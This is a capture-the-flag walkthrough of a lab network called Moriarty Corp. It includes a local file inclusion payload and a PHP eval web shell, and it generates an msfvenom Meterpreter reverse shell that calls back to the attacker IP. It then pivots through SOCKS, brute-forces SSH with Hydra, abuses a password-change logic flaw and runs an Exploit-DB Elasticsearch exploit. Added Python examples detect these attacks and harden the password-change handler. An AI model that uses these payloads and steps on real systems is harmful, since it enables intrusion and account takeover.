OvO

Moriarty_Corp

| Host | External IP | Internal IP |
|---|---|---|
| Attacker Kali | 192.168.56.102 | / |
| MoriartyCorp | 192.168.56.101 | 172.17.0.3 |
| File upload on port 80 | / | 172.17.0.4 |
| Remote connection on port 22 | / | 172.17.0.10 |
| Password change on port 8000 | / | 172.17.0.11 |
| Exploit on port 9200 | / | 172.17.0.12 |

Network Topology Diagram

First flag:

Host discovery:

nmap -sn -PR -T4 192.168.56.0/24

192.168.56.101 is the target host.

Port scanning:

nmap -p- -A 192.168.56.101

Open ports: 22, 8000, 9000

Port access: ports 8000 and 9000 were opened in the browser.

Suspected file inclusion vulnerability; test it with a traversal payload in the `file` parameter:

192.168.56.101/?file=../../../../../../../etc/passwd

Path traversal vulnerability confirmed.

Build a one-liner web shell file on Kali and start an HTTP server to serve it:

<?php @eval($_POST['hack']); ?>

python -m http.server 80

Include the web shell remotely through the same parameter:

192.168.56.101/?file=http://192.168.56.102:80
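
The two requests above, a traversal sequence in the `file` parameter and then a remote URL in the same parameter, are exactly what a defender wants to alert on in the web server's access log. The following is an added example, not code from the original post, that scans access-log lines in combined format for those patterns in include-style parameters; the log lines are constructed for the example, and the watched parameter names (`file`, `page`, `include`, `path`) are an assumption.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format); not taken from the original post.
SAMPLE_LOG = """\
192.168.56.102 - - [10/Jan/2024:10:00:01 +0000] "GET /?file=index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.56.102 - - [10/Jan/2024:10:00:05 +0000] "GET /?file=../../../../../../../etc/passwd HTTP/1.1" 200 1433 "-" "Mozilla/5.0"
192.168.56.102 - - [10/Jan/2024:10:00:09 +0000] "GET /?file=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1433 "-" "Mozilla/5.0"
192.168.56.102 - - [10/Jan/2024:10:00:12 +0000] "GET /?file=http://192.168.56.102:80 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Jan/2024:10:01:00 +0000] "GET /about.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:", "expect://")
WATCHED_PARAMS = ("file", "page", "include", "path")  # assumption: typical include-parameter names


def classify_value(value):
    """Classify one parameter value as 'traversal', 'remote_include' or None."""
    # Decode twice so single- and double-URL-encoded payloads are both normalised.
    decoded = unquote(unquote(value)).lower()
    if "../" in decoded or "..\\" in decoded:
        return "traversal"
    if decoded.startswith(REMOTE_SCHEMES):
        return "remote_include"
    return None


def scan_access_log(text, watched=WATCHED_PARAMS):
    """Return one finding per suspicious include-parameter value in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for param in watched:
            for value in query.get(param, []):
                kind = classify_value(value)
                if kind:
                    findings.append({
                        "ip": m["ip"], "time": m["ts"], "param": param,
                        "kind": kind, "value": value, "status": int(m["status"]),
                    })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['kind']:15} {f['param']}={f['value']} -> {f['status']}")
```

The third sample line is double-encoded, which a naive `../` substring match on the raw request would miss; the status code is kept in each finding because a 200 on a traversal request (rather than a 4xx) is what separates a successful inclusion from a blocked probe.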

Connect to the web shell with AntSword.

Obtained the first flag:

flag{the_game_is_on}

After submitting the flag, a new hint is received: the internal network range is 172.17.0.3-254.

Begin internal network penetration.

Second flag:

Create a Meterpreter payload with msfvenom, then upload it to the target to start the internal network penetration:

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.56.102 lport=6666 -f elf > hack.elf

Start a listener in msfconsole:

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.56.102
set lport 6666
exploit

Make the payload executable on the target machine and run it:

chmod 777 hack.elf
./hack.elf

Add a route to the internal network through the Meterpreter session:

run autoroute -s 172.17.0.0/24

Background the session and start the Metasploit SOCKS proxy:

bg
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set srvport 1080
run

Then point proxychains at it by editing its configuration file:

vim /etc/proxychains4.conf

socks5 127.0.0.1 1080

Scan the internal network for port 80 through the proxy:

proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -T4 -p80

Access 172.17.0.4:80.

The page allows file upload but requires a password. Use Burp Suite to capture the request and brute-force the password:

Configure Firefox to proxy through Burp Suite, and configure the SOCKS proxy in Burp Suite so the requests reach the internal network.

Run the capture and brute-force; the correct password is identified by the differing response length.

Upload a one-liner web shell to the target machine and browse to the uploaded file.

Configure the SOCKS5 proxy in AntSword and connect to the web shell.

Obtain the second flag:

flag{picture_is_worth_1000_words}

After submitting the flag, a new hint is received: some usernames and MD5-hashed passwords, with a suggestion to try attacking over SSH.

Third flag:

Scan the internal network for hosts with port 22 open:

proxychains4 nmap -sV -sT -Pn -p22 172.17.0.0/24

Found host 172.17.0.10:22.

Use Hydra (shipped with Kali) to brute-force the SSH login with the recovered username and password lists:

proxychains4 hydra -L username.txt -P password.txt ssh://172.17.0.10

Credentials recovered:

root weapons

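
From the defender's side, the Hydra run above leaves a dense burst of `Failed password` lines in sshd's log, followed by an `Accepted password` from the same source once the list hits. The following added example (not code from the original post) parses a constructed sshd log excerpt in syslog format, flags a source that exceeds a failure threshold inside a time window, and records when that same source then logs in successfully; the threshold, the window and the log lines are assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log excerpt in syslog format; not taken from the original post.
SAMPLE_AUTH_LOG = """\
Jan 10 10:00:01 weapons sshd[1201]: Failed password for root from 172.17.0.3 port 40010 ssh2
Jan 10 10:00:01 weapons sshd[1202]: Failed password for invalid user moriarty from 172.17.0.3 port 40011 ssh2
Jan 10 10:00:02 weapons sshd[1203]: Failed password for root from 172.17.0.3 port 40012 ssh2
Jan 10 10:00:02 weapons sshd[1204]: Failed password for root from 172.17.0.3 port 40013 ssh2
Jan 10 10:00:03 weapons sshd[1205]: Failed password for root from 172.17.0.3 port 40014 ssh2
Jan 10 10:00:03 weapons sshd[1206]: Accepted password for root from 172.17.0.3 port 40015 ssh2
Jan 10 10:05:00 weapons sshd[1300]: Accepted publickey for deploy from 10.0.0.5 port 51000 ssh2
"""

AUTH_RE = re.compile(
    r'^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) '
    r'from (?P<ip>\S+) port'
)


def analyze_auth_log(text, threshold=5, window_seconds=60):
    """Flag source IPs with at least `threshold` failed logins inside `window_seconds`,
    and note when such a source afterwards logs in successfully."""
    failures = defaultdict(list)  # ip -> timestamps of failed logins
    users = defaultdict(set)      # ip -> usernames tried from that ip
    alerts = {}
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if not m:
            continue  # not an sshd authentication line
        # syslog timestamps carry no year; strptime defaults to 1900, which is fine for windowing
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        ip = m["ip"]
        recent = [t for t in failures[ip] if (ts - t).total_seconds() <= window_seconds]
        if m["result"] == "Failed":
            failures[ip].append(ts)
            users[ip].add(m["user"])
            if len(recent) + 1 >= threshold:
                entry = alerts.setdefault(ip, {"failures": 0, "users": set(), "success_after_failures": None})
                entry["failures"] = len(failures[ip])
                entry["users"] = set(users[ip])
        elif ip in alerts and recent:
            # a login accepted shortly after a flagged burst is the signature of a successful guess
            alerts[ip]["success_after_failures"] = m["user"]
    return alerts


if __name__ == "__main__":
    for ip, info in analyze_auth_log(SAMPLE_AUTH_LOG).items():
        print(ip, info["failures"], "failures, users tried:", sorted(info["users"]),
              "then accepted as:", info["success_after_failures"])
```

The `success_after_failures` field is the one worth paging on: a burst of failures alone may be a misconfigured client, but a burst followed by an accepted login from the same source means the credential list contained a valid pair.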
Log in over SSH to 172.17.0.10 and obtain the third flag:

proxychains4 ssh root@172.17.0.10

flag{what_weapons}

After submitting the flag, a new hint is received: a new username and password, and a note that chat services may be listening on ports 443, 8000, 8080, 8888.

Fourth flag:

Port-scan the internal network for the hinted ports:

proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -T4 -p443,8000,8080

Found host: 172.17.0.11:8000

172.17.0.11:8000 requires a login; log in with the username and password from the hint:

Username: buyer13
Password: arms13

The application offers a password-change function. Suspecting a logic flaw that allows changing any user's password, capture the request in Burp Suite and modify it so the password is set for admin.

Log in again as admin; the login succeeds.

Obtain the flag:

flag{on_the_move}

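
The flaw exploited in the password-change step above is a handler that takes the account to modify from the client request rather than from the server-side session, and never asks for the current password. As an added example (not code from the original post, and not the target application's code, which the post does not show), here is a minimal vulnerable handler beside a hardened one. The in-memory user store, the admin password placeholder and the form field names are constructed assumptions.

```python
import hashlib
import hmac
import os

PBKDF2_ROUNDS = 100_000


def hash_password(password, salt=None):
    """Return (salt, digest) using salted PBKDF2-HMAC-SHA256 rather than unsalted MD5."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


def verify_password(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)


# Constructed in-memory user store; the admin password is a placeholder, not a value from the target.
USERS = {}
for _name, _pw in (("buyer13", "arms13"), ("admin", "placeholder-admin-password")):
    _salt, _digest = hash_password(_pw)
    USERS[_name] = {"salt": _salt, "digest": _digest}


def change_password_vulnerable(session, form):
    """The flawed pattern: trusts a client-supplied username and never checks the
    current password, so any logged-in user can reset any other account."""
    target = form["username"]
    USERS[target]["salt"], USERS[target]["digest"] = hash_password(form["new_password"])
    return target


class PasswordChangeError(Exception):
    pass


def change_password_hardened(session, form):
    """Hardened handler: the account comes from the authenticated session only,
    the current password must be re-proven, and the new password is policy-checked."""
    target = session["user"]  # any 'username' field in the form is ignored
    record = USERS[target]
    if not verify_password(form.get("current_password", ""), record["salt"], record["digest"]):
        raise PasswordChangeError("current password is incorrect")
    new_password = form.get("new_password", "")
    if len(new_password) < 12:
        raise PasswordChangeError("new password must be at least 12 characters")
    record["salt"], record["digest"] = hash_password(new_password)
    return target


if __name__ == "__main__":
    # A session for a low-privilege user submitting a form that names a different account.
    session = {"user": "buyer13"}
    form = {"username": "admin", "current_password": "arms13", "new_password": "a-long-new-password"}
    print("vulnerable handler changed:", change_password_vulnerable(session, form))
    print("hardened handler changed:  ", change_password_hardened(session, form))
```

Run as a script, the vulnerable handler reports that it changed `admin` while the hardened one reports `buyer13`: the same request, differing only in which side is trusted for the account identity. Logging the session user alongside the account actually modified, and alerting when they differ, is the corresponding detection for applications that cannot be fixed immediately.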
After submitting the flag, a new hint is received: the next target uses Elasticsearch, which usually runs on port 9200.

Elasticsearch is an open-source, highly scalable distributed full-text search engine that listens on port 9200 by default.

Fifth flag:

Port-scan the internal network for port 9200:

proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -T4 -p9200

Found host: 172.17.0.12:9200

Search the local Exploit-DB copy on Kali for Elasticsearch exploits and copy the matching script:

searchsploit -t Elasticsearch

cp /usr/share/exploitdb/exploits/linux/remote/36337.py /home/kali/Desktop

Run the script against 172.17.0.12:9200 through the proxy:

proxychains4 python 36337.py 172.17.0.12

Successfully obtained the last flag:

flag{game_over}

After submitting the last flag, the target environment reports that the IP has been banned and can no longer be accessed. This concludes the penetration of the target environment.

If you have any questions, feel free to consult:
ace@pomeow.com
